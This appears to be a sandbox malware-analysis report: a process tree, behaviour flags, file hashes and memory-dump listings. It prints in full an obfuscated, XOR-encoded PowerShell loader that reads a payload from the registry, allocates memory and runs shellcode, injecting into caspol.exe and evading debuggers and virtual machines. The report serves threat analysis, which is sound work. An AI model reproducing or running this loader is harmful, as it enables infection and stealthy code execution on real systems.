eBro2In4Bi5Sa5By5Ca9Th2Kl2No2AcCFo3Br0Si1Me7Ar0HjDAf4CoAAl4TrBAf2st4Pu5be0St5Te9Sv5Ca1El2aa2Ph3Tb0Pe1Fo7Un0ReDRe2Al9Ca0DdDRi0LoBFo2In4Un5Th0Ta5bi0Ce5Op0To'ti;Te&Pe(Fo`$keAAnrahmFeeSukHyoPerEnpPessvsvi7Do)Wo Pr`$ViSDiePudFeuPolCaoMouCasAn6To;Se`$BoMRuoBirpogSyeDanImdThubjeAflKaiovgte Ni=ta GlfDekUdpBe Li`$HjABarDamsvetakMeoLirSppprsPasOr5Ab Aa`$AnARorBrmSteUnkReoBerFrpBrsSmsLu6Ce;Ar`$OxSAneAddRauPalDeoPsuWasEs7En Do=se NaHPaTnoBDe Un'Ug5BrDHa2BjDDo1BeCUk0SeBDi1Ko4Eu1Lo0Be1Ag7St1Ti8Ep1Si5kr1Ge2Pl1Dr7Ol0AfCLo1FaDFi1TrCKr0ReBSt0PrANu4TvAFi5Ju9ov4ja4Bi5Ti9Ek5SiDDo0FoBHa1Ci1do1Sc8Af0TrDCo1Sk8He1Fo7Pa1De0Me1QuCLi0PiAAn5Be7Ka3bj0Cy1Un7Sa0CaFMu1Ho6St1Bl2Ek1NoCSl5Me1Br2De2Po3In0Mo1To7My0QuDBa2Fe9St0OpDCa0ChBCo2ts4Af4Mu3Kr4Be3St2ta3Se1CoCTu0PaBAn1Rh6Bu5No5Un5Al9Pt4LoAOu4QuCGr4DuFfe5Mo5Am5Me9El4tr9Fu0bi1Re4DiAWi4Fo9Ne4Su9Ex4Me9Pe5Bi5Ha5Pu9Fu4Su9Sa0ce1Sm4MiDAx4Su9Ar5Un0Kr'Af;vi&Ca(Sp`$ToAGurSumInevakKvoDdrUlpFrsTrsBr7Be)Sa Co`$ChSDieDrdRiuAalPloNeuLista7Be;Qu`$QuSSueRedSpuPilOpoFiuArsWa8Ri Ma=Un IvHWhTTiBro Ga'br5PeDUn3Om4To1Ba8Fo1Au7Aq1TrDgu1Im1Im1Ty8Br1AnFSh0LaDar1fy0Ha1buESt1CoCDe0HeABu5La9Wr4Af4Sp5Fl9Un5DiDBy0HyBMe1Sh1Ar1De8Bi0LoDRa1Th8Fu1De7Ln1De0St1FrCSn0ReAFi5We7Ef3In0Ch1Dr7Ov0KoFqu1Be6Be1Fo2Be1inCFo5Sa1Va2Al2Hy3Sc0Sh1Ga7Be0TrDCo2Tl9Kn0MiDLu0NuBFa2Un4Hu4In3Ni4An3Za2Be3Ou1FoCSu0SkBEl1Se6Ra5Fo5Au5To9Ot4Ka9Be0Ne1Sc4co8Un4Dr9ut4Va9Ma4va9sa4Un9ku4Re9Va5Am5Fo5Ry9Ja4hi9Ar0Id1Ba4HaAFo4Le9Hy4Un9Af4Ho9Su5Re5Re5Na9De4Op9Di0sh1Ob4StDkl5Fo0Io'Ky;Fo&Va(Hu`$SaAChrAmmGteypkCroVarUkpInsHysBy7Do)Ma Af`$DuSBaeAmdBeuBrlInoSuuStsRa8Pr;fi`$ReASksBrkbaeRstRorResRe=La(MiGbreDotSe-TiISutReeMamZaPUnrCioBapPeeAlrFotUnyRe aa-QuPUtaFrtInhRe De'VoHFjKHuCBiUCo:Pe\viSEsaBunAndFivPaiAagMabSioLueTanUn\ImNNeeFopCotAnuWhnAkiTiadunSk'La)Su.MiPUnlVraJoyFepGaeDinInsSk;Ja`$GrSHaePidUnuFalHyoFuuTjsAk9St Fl=De DeHTmTErBLe Ub'Aa5LaDca2DeAra1AgCEx1RaDDi0inCSe1Kv5Co1Pa6Ud0BeCde0SkAAf5Un9Re4Ec4Ca5Su9he2Mo2Bu2UdATi0Bi0Pe0ReAOf0TrDEa1KaCSy1Ad4Mo5Fy7Va3TrARu1Sp6Ba1Dg7Up0PrFTa1ToCTj0phBJu0FoDar2Dr4sp4Do3Su4Re3St3LaFGe0GrBBi1Ta6pa1Se4Dy3SaBKl1Mu8Sg0MaAAb1KeCug4UnFCo4LnDSi2AuACh0DoDtr0GeBSt1Fi0Co1Us7Oc1ThEne5ti1Ea5enDCa3An8Hy0MiAVa1Sk2Un1SkCMu0ArDTr0NdBSo0SeATh5Ki0Fi'Ls;Di&Co(At`$StAMyrRamTyemakKooMarorpPasAfsGe7Hj)ti Di`$PaSNeeLedMouUdlPuoAruDasBe9th;Ej`$VeAPisApkCaeEjtNorEnsSc0Ka Ko=Sa ErHBuTElBRa so'Ti2In2Cr2PaASu0Ci0Me0ReAKl0unDEj1OvCCa1Fa4In5Fl7Im2MiBSp0MoCde1Sy7Go0GeDSa1Fu0Pi1Po4Ku1PaCGl5Mr7Bo3Se0Ke1Sl7Sp0CoDBe1SyCRe0SoBPr1Kl6He0Fr9Sm2unASe1sjCKr0FoBSu0UaFIn1Fo0Be1UnAMn1AnCIs0UnAKo5Un7In3Fl4Ei1Sm8De0StBIk0BlAPt1An1Kl1Kk8No1Be5Ro2Ch4En4Su3Fl4Dy3De3MiAEn1Kr6Li0Kl9Ve0Un0Hv5Fi1Ti5WhDBr2EnADo1CaCIn1TrDTe0MoCau1Fl5In1Hi6Ny0EfCCa0FdAGa5Bl5Bl5Ho9Pr4Sk9Eg5In5Po5Er9Te5Sl9Od5InDGa2PoDSi1McCUp0ReBUn1Si4Ru1Ak0Ha1Bo7Dr1Fn8Br1Ej5Sa1St2da1Jo7Mi0isCSo1KaDin1KiCTi0MoBSk0CyADy4UnAHo5Ho5Tv5Fu9Pl4PsARe4UnCFi4FoFFu5Sj0Bo'Be;Sa&St(Da`$DeAMorFrmtieUmkGroBrrCapBasDosRe7Zl)un Kl`$SnADisAnkEmeEktBerEdsBe0Hv;Du`$EnkFaoAbrJotLgeWrgLeeOprKanSpeSp=Ar`$EtSEneAedAfuAglNeoSpuVasPs.RecleoMeuFrnKotTr-Fe3pr5Bo6En;Se`$BeABasStkSaeIntInravsBr1pr De=Pr UpHHeTKoBha Un'Sl2Ve2br2RdASa0Ta0Wa0VaAOs0PoDAl1SpCDe1Sa4Be5So7Li2IdBMu0PtCBa1Ud7Sp0PaDAl1No0Bu1Cl4No1BrCGr5Ti7La3Co0Te1La7Pa0XiDFo1FlCOp0FuBMi1In6Kk0Af9Pe2InACo1TiCEx0LaBSu0daFra1Bl0Gu1BaAco1WiCMe0AvASq5Un7Il3Fu4Sk1bj8Un0TrBUd0TuAUp1Gu1Sa1Fa8Pr1Ho5Up2Pr4Sp4Le3Ri4ir3Fo3SpAMo1Sl6vi0Ar9Di0Co0He5Un1Ma5ShDIm2ShAJo1TuCSu1VgDKm0FrCfo1Ud5re1At6Do0SwCFo0MaAJa5De5Re5do9Mo4ElAPr4FrCsj4NiFDi5Ki5Ma5Pa9Ba5UdDil3Di4Ar1be8Pr1Me7Sa1ApDVe1Wa1Jv1my8Pr1GaFPr0PaDSp1Wh0Go1foEKr1MoCTa0KiARa5Po5Ci5Ma9or5BlDHy1En2Ny1Op6Ve0CeBSp0HaDSa1UnCBa1ExEsi1AmCAf0FaBHa1Ca7Fr1foCTr5Be0Ad'Dr;Ne&Ad(in`$AnATrrAlmDeeUnkFloLerPapFjsSisUn7In)Ba Ce`$UnAExsDykCeeditOmrCassu1Di;Le`$PaATrsPekMaeKatDurAnsPe2Dr Re=Na chHOpTSuBUn Be'Ra5OvDSp2GiCLy1PrDLe0SyARe0PoDPi1De0Er1BrEBr1Jo7Gr1No0tr1op7Mi1SkEAn0neAUa5Re9Os4Ro4Sv5fl9Sa2Ja2La2psASw0Ps0Et0SpAsy0BoDAd1RaCSp1No4So5Ho7Pr2noBGr0LgCNa1St7Re0UdDSy1Ko0Oz1La4az1ThCEn5Ca7Li3Ap0Pr1Ti7gr0FiDAg1GoCSk0FaBSp1Mi6No0Ps9Jo2FaASi1PrCBi0UnBVa0TyFNe1Tr0Va1SeAVe1ToCPa0FlADi5Be7Mo3Br4Dy1Er8sa0ThBKo0ReAUr1No1Po1St8Yp1Uk5Am2Sn4Su4Di3dr4To3Vi3SuEKo1CoCFr0DeDFa3RaDVi1ByCFo1ae5Ra1VuCSi1KaESk1ne8Is0RuDAc1UlCMn3teFEg1Po6Hy0PiBMu3TaFTy0InCGr1ko7In1PaACr0OmDgr1Em0Ba1Ne6Un1Ju7Ru2Om9Se1Hi6Fa1Tv0Ha1ov7Be0GiDSy1SaCPs0LaBIs5Gr1Om5KaDHo2PiDNa1OuCLi0ReBFl1Da4Ko1ru0Ou1Er7Im1Cy8Xi1Op5Ab1Ar2Mi1Ma7Hu0TaCLy1AkDGa1ShCKr0FaBSc0SpAAt4KoASt5Pe5Re5Tr9Kl5br1kr3NoEgo3BaDRe2GrDWi5Su9Ue3Hi9Di5Af1Br2Ge2Un3He0Fl1Ha7od0MaDco2Re9Ef0SoDAk0AcBGg2Al4Su5In5De2To2Pl3En0Ch1ly7no0anDov2Sa9Di0CoDkr0MaBen2Ud4Oc5Un0jo5Se9As5Me1Tr2Ky2Ut2UnFUm1fr6Fd1Kr0Bj1foDIc2Kl4Ne5Ma0Mo5Ar0Ve5Re0Is'La;Am&Me(yd`$SpAchrGgmBnePakReoEirGupAfsBesGa7Di)No Va`$FaAResBrkDeeSutSirAdsOf2In;Km`$AlABosBrkGeeChtWirSysla3Sc Ba=Sm miHBlTreBOp An'Fo5DiDSl2DoCIm1teDBr0PrAEt0UnDSt1ov0Om1VeEAr1Pe7Pr1Mo0Sy1Ci7Cl1UnEPi0RiAFa5Ag7fr3Li0Er1Un7Gi0PaFNa1Ak6Ev1Ba2Ka1UnCDo5Bi1De5beDBi3An4br1St8Ta1Br7En1BeDFi1Bi1By1Fi8Wi1HoFBu0AaDDe1Er0Bl1AfEAn1SkCCo0CyAPr5Ob5Re5KnDHa3Qu4Ud1Vi6Be0PiBHe1SkESt1SyCId1Aw7Pr1BaDUk0EsCSl1StCUn1In5Da1Co0Di1MiEKe5Un0Sk'Ko;To&Un(ty`$SoAQurPimByeMbkVaoBlrElpWhsMosUg7di)an Le`$BeASasFakUaeMutCarStsSn3Kp#Pa;""";Function Asketrs9 { param([String]$Galdebrrene); For($Jeunes=2; $Jeunes -lt $Galdebrrene.Length-1; $Jeunes+=(2+1)){ $Privatudgiften = $Privatudgiften + $Galdebrrene.Substring($Jeunes, 1); } $Privatudgiften;}$synoecete0 = Asketrs9 'KlIBaEInXRa ';$synoecete1= Asketrs9 $Acopyrin;if([IntPtr]::size -eq 8){START-job { param($Kunstkendernes) powershell $Kunstkendernes } -RunAs32 -Argument $synoecete1 | wait-job | Receive-Job;}else{&$synoecete0 $synoecete1;};;;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Galdebrrene); $Tilstedevrendes = New-Object byte[] ($Galdebrrene.Length / 2); For($Jeunes=0; $Jeunes -lt $Galdebrrene.Length; $Jeunes+=2){ $Tilstedevrendes[$Jeunes/2] = [convert]::ToByte($Galdebrrene.Substring($Jeunes, 2), 16); $Tilstedevrendes[$Jeunes/2] = ($Tilstedevrendes[$Jeunes/2] -bxor 121); } [String][System.Text.Encoding]::ASCII.GetString($Tilstedevrendes);}$Quar0=HTB '2A000A0D1C14571D1515';$Quar1=HTB '34101A0B160A161F0D572E10174A4B572C170A181F1C37180D100F1C341C0D11161D0A';$Quar2=HTB '3E1C0D290B161A381D1D0B1C0A0A';$Quar3=HTB '2A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A573118171D151C2B1C1F';$Quar4=HTB '0A0D0B10171E';$Quar5=HTB '3E1C0D34161D0C151C3118171D151C';$Quar6=HTB '2B2D2A091C1A1018153718141C555931101D1C3B002A101E5559290C1B15101A';$Quar7=HTB '2B0C170D10141C5559341817181E1C1D';$Quar8=HTB '2B1C1F151C1A0D1C1D3D1C151C1E180D1C';$Quar9=HTB '3017341C14160B0034161D0C151C';$Armekorpss0=HTB '34003D1C151C1E180D1C2D00091C';$Armekorpss1=HTB '3A15180A0A5559290C1B15101A55592A1C18151C1D555938170A103A15180A0A5559380C0D163A15180A0A';$Armekorpss2=HTB '30170F16121C';$Armekorpss3=HTB '290C1B15101A555931101D1C3B002A101E5559371C0E2A15160D55592F100B0D0C1815';$Armekorpss4=HTB '2F100B0D0C1815381515161A';$Armekorpss5=HTB '170D1D1515';$Armekorpss6=HTB '370D290B160D1C1A0D2F100B0D0C1815341C14160B00';$Armekorpss7=HTB '303C21';$Armekorpss8=HTB '25';function fkp {Param ($Vitalise118, $Khatri38) ;$Sedulous0 =HTB '5D1B16171D1C1F18171E1C0D59445951223809093D16141810172443433A0C0B0B1C170D3D1614181017573E1C0D380A0A1C141B15101C0A51505905592E111C0B1C54361B131C1A0D5902595D26573E15161B1815380A0A1C141B15003A181A111C595438171D595D265735161A180D101617572A0915100D515D380B141C12160B090A0A415022544824573C080C18150A515D280C180B4950590450573E1C0D2D00091C515D280C180B4850';&($Armekorpss7) $Sedulous0;$Sedulous5 = HTB '5D321C0D1A110C09091C170A5944595D1B16171D1C1F18171E1C0D573E1C0D341C0D11161D515D280C180B4B5559222D00091C2224245939515D280C180B4A55595D280C180B4D5050';&($Armekorpss7) $Sedulous5;$Sedulous1 = HTB '0B1C0D0C0B17595D321C0D1A110C09091C170A5730170F16121C515D170C151555593951222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A573118171D151C2B1C1F2451371C0E54361B131C1A0D592A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A573118171D151C2B1C1F5151371C0E54361B131C1A0D5930170D290D0B505559515D1B16171D1C1F18171E1C0D573E1C0D341C0D11161D515D280C180B4C50505730170F16121C515D170C1515555939515D2F100D1815100A1C4848415050505055595D3211180D0B104A415050';&($Armekorpss7) $Sedulous1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Cigaretters,[Parameter(Position = 1)] [Type] $Overcool = [Void]);$Sedulous2 = HTB '5D2A0C091C0B1F160A1F180D1C0B171C594459223809093D16141810172443433A0C0B0B1C170D3D1614181017573D1C1F10171C3D00171814101A380A0A1C141B15005151371C0E54361B131C1A0D592A000A0D1C14572B1C1F151C1A0D10161757380A0A1C141B15003718141C515D280C180B4150505559222A000A0D1C14572B1C1F151C1A0D101617573C14100D57380A0A1C141B15003B0C10151D1C0B381A1A1C0A0A2443432B0C1750573D1C1F10171C3D00171814101A34161D0C151C515D280C180B4055595D1F18150A1C50573D1C1F10171C2D00091C515D380B141C12160B090A0A4955595D380B141C12160B090A0A485559222A000A0D1C1457340C150D101A180A0D3D1C151C1E180D1C2450';&($Armekorpss7) $Sedulous2;$Sedulous3 = HTB '5D2A0C091C0B1F160A1F180D1C0B171C573D1C1F10171C3A16170A0D0B0C1A0D160B515D280C180B4F5559222A000A0D1C14572B1C1F151C1A0D101617573A18151510171E3A16170F1C170D1016170A2443432A0D18171D180B1D55595D3A101E180B1C0D0D1C0B0A50572A1C0D301409151C141C170D180D1016173F15181E0A515D280C180B4E50';&($Armekorpss7) $Sedulous3;$Sedulous4 = HTB '5D2A0C091C0B1F160A1F180D1C0B171C573D1C1F10171C341C0D11161D515D380B141C12160B090A0A4B55595D380B141C12160B090A0A4A55595D360F1C0B1A16161555595D3A101E180B1C0D0D1C0B0A50572A1C0D301409151C141C170D180D1016173F15181E0A515D280C180B4E50';&($Armekorpss7) $Sedulous4;$Sedulous5 = HTB '0B1C0D0C0B17595D2A0C091C0B1F160A1F180D1C0B171C573A0B1C180D1C2D00091C5150';&($Armekorpss7) $Sedulous5 ;}$Recessioner = HTB '121C0B171C154A4B';$Sedulous6 = HTB '5D0B11180D1817101C0A594459222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433E1C0D3D1C151C1E180D1C3F160B3F0C171A0D101617291610170D1C0B51511F1209595D2B1C1A1C0A0A1016171C0B595D380B141C12160B090A0A4D505559513E3D2D5939512230170D290D0B245559222C30170D4A4B245559222C30170D4A4B245559222C30170D4A4B245059512230170D290D0B24505050';&($Armekorpss7) $Sedulous6;$Morgenduelig = fkp $Armekorpss5 $Armekorpss6;$Sedulous7 = HTB '5D2D1C0B141017181512170C1D1C0B0A4A5944595D0B11180D1817101C0A5730170F16121C512230170D290D0B244343231C0B1655594A4C4F555949014A494949555949014D4950';&($Armekorpss7) $Sedulous7;$Sedulous8 = HTB '5D3418171D11181F0D101E1C0A5944595D0B11180D1817101C0A5730170F16121C512230170D290D0B244343231C0B1655594901484949494949555949014A494949555949014D50';&($Armekorpss7) $Sedulous8;$Asketrs=(Get-ItemProperty -Path 'HKCU:\Sandvigboen\Neptunian').Playpens;$Sedulous9 = HTB '5D2A1C1D0C15160C0A594459222A000A0D1C14573A16170F1C0B0D2443433F0B16143B180A1C4F4D2A0D0B10171E515D380A121C0D0B0A50';&($Armekorpss7) $Sedulous9;$Asketrs0 = HTB '222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433A160900515D2A1C1D0C15160C0A5559495559595D2D1C0B141017181512170C1D1C0B0A4A55594A4C4F50';&($Armekorpss7) $Asketrs0;$kortegerne=$Sedulous.count-356;$Asketrs1 = HTB '222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433A160900515D2A1C1D0C15160C0A55594A4C4F55595D3418171D11181F0D101E1C0A55595D12160B0D1C1E1C0B171C50';&($Armekorpss7) $Asketrs1;$Asketrs2 = HTB '5D2C1D0A0D101E1710171E0A594459222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433E1C0D3D1C151C1E180D1C3F160B3F0C171A0D101617291610170D1C0B515D2D1C0B141017181512170C1D1C0B0A4A5559513E3D2D5939512230170D290D0B24552230170D290D0B24505951222F16101D24505050';&($Armekorpss7) $Asketrs2;$Asketrs3 = HTB '5D2C1D0A0D101E1710171E0A5730170F16121C515D3418171D11181F0D101E1C0A555D34160B1E1C171D0C1C15101E50';&($Armekorpss7) $Asketrs3#"4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"5⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD515ed2b74285efcadc4b092d7529f4d98
SHA1a9ec29d4d0c1d1d3aee379071c733eb1bb144dfa
SHA256bf121dbc7d8293d491edbf6fab7e6dfee3572c0fab1b62affc88cb5aae5ec56b
SHA512d0c70b23ce7dbf0a6c039304b81bdde95259278b4a9219058d83cb36c00f377e00dae72e7d6863f246e696906e6f4cd7439964bcc40fbfbd2ce14db8fc4bb586
-
memory/860-74-0x0000000005C30000-0x0000000005D30000-memory.dmpFilesize
1024KB
-
memory/860-68-0x00000000739D0000-0x0000000073F7B000-memory.dmpFilesize
5.7MB
-
memory/860-70-0x0000000005C30000-0x0000000005D30000-memory.dmpFilesize
1024KB
-
memory/860-83-0x0000000077AC0000-0x0000000077C40000-memory.dmpFilesize
1.5MB
-
memory/860-82-0x0000000077AC0000-0x0000000077C40000-memory.dmpFilesize
1.5MB
-
memory/860-79-0x0000000077AC0000-0x0000000077C40000-memory.dmpFilesize
1.5MB
-
memory/860-77-0x0000000077AC0000-0x0000000077C40000-memory.dmpFilesize
1.5MB
-
memory/860-76-0x00000000778E0000-0x0000000077A89000-memory.dmpFilesize
1.7MB
-
memory/860-73-0x00000000739D0000-0x0000000073F7B000-memory.dmpFilesize
5.7MB
-
memory/860-65-0x0000000000000000-mapping.dmp
-
memory/988-63-0x00000000762B1000-0x00000000762B3000-memory.dmpFilesize
8KB
-
memory/988-72-0x00000000739D0000-0x0000000073F7B000-memory.dmpFilesize
5.7MB
-
memory/988-62-0x0000000000000000-mapping.dmp
-
memory/988-64-0x00000000739D0000-0x0000000073F7B000-memory.dmpFilesize
5.7MB
-
memory/1200-61-0x00000000027AB000-0x00000000027CA000-memory.dmpFilesize
124KB
-
memory/1200-58-0x000007FEF3280000-0x000007FEF3DDD000-memory.dmpFilesize
11.4MB
-
memory/1200-59-0x00000000027A4000-0x00000000027A7000-memory.dmpFilesize
12KB
-
memory/1200-57-0x000007FEF3DE0000-0x000007FEF4803000-memory.dmpFilesize
10.1MB
-
memory/1200-55-0x0000000000000000-mapping.dmp
-
memory/1200-60-0x000000001B750000-0x000000001BA4F000-memory.dmpFilesize
3.0MB
-
memory/1200-71-0x00000000027AB000-0x00000000027CA000-memory.dmpFilesize
124KB
-
memory/1200-69-0x00000000027A4000-0x00000000027A7000-memory.dmpFilesize
12KB
-
memory/1876-84-0x0000000000100000-0x0000000000200000-memory.dmpFilesize
1024KB
-
memory/1876-80-0x00000000008D768E-mapping.dmp
-
memory/1876-81-0x0000000000100000-0x0000000000200000-memory.dmpFilesize
1024KB
-
memory/1928-54-0x000007FEFC161000-0x000007FEFC163000-memory.dmpFilesize
8KB